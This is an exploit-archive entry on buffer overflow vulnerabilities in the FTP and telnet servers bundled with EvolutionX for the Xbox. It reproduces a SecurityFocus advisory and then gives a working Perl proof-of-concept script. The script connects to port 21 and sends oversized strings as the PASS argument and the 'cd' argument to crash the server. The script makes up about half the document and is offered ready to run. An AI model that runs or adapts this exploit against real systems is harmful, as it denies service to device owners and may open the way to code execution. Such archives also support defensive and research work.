EvolutionX - Multiple Remote Buffer Overflow Vulnerabilities

source: https://www.securityfocus.com/bid/9631/info

The FTP server that is distributed with EvolutionX has been reported prone to multiple buffer overflow vulnerabilities. The first of these vulnerabilities exists post-authentication, and is due to a lack of sufficient bounds checking performed on arguments that are passed to the 'cd' command.

The second issue exists pre-authentication, excessive data passed as username:password combination to the affected FTP server will trigger the buffer overrun. 

Finally the telnet server that is distributed with EvolutionX has been reported prone to a buffer overflow vulnerability when handling excessive data passed as an argument to the 'dir' command. 

An attacker may exploit any one of these issues to deny service to legitimate users of the XBOX appliance, it has been conjectured that these issues may be exploitable to result in arbitrary code execution.

#!/usr/bin/perl
#
# EvolutionX buffer overflow by Moth7
# http://www.bit-labs.net
#
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "ftp(21)",
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }

$remote->autoflush(1);

print $remote "USER anonymous\r\n";
sleep(1);

$buf = '\m/'x999;

print $remote "PASS ".$buf."\r\n";      # Try and overrun the PASS buffer
sleep(1);

print $remote"cd ".$buf."\r\n";         # If it fails then overrun the cd buffer instead -
sleep(1);                               # but 2997 characters should do it :p

close $remote;